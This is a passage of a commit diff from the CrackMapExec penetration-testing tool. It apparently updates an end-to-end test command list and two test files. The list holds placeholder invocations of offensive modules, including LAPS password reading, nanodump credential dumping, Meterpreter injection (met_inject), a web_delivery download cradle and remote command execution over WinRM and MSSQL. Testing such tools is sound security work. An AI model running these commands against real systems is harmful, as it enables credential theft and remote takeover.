crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-network --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M laps --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M ldap-checker
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M maq --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M subnets
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M subnets --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle

4
tests/e2e_test.py
View File

@ -31,9 +31,11 @@ def generate_commands():
with open(commands_file) as file:
for line in file:
if line.startswith("#"):
continue
line = line.strip()
line = line.replace("TARGET", args.target) \
.replace("USER", f"\"{args.username}\"") \
.replace("USERNAME", f"\"{args.username}\"") \
.replace("PASSWORD", f"\"{args.password}\"") \
.replace("KERBEROS", kerberos)
lines.append(line)

5
tests/test_smb_database.py
View File

@ -5,9 +5,10 @@ import os
import pytest
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from cme.cmedb import create_workspace, delete_workspace
from cme.first_run import first_run_setup
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.logger import setup_logger, CMEAdapter
from cme.paths import WS_PATH
from sqlalchemy.dialects.sqlite import Insert
@ -31,7 +32,7 @@ def db_setup(db_engine):
setup_logger()
logger = CMEAdapter()
first_run_setup(logger)
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
create_workspace("test", p_loader, protocols)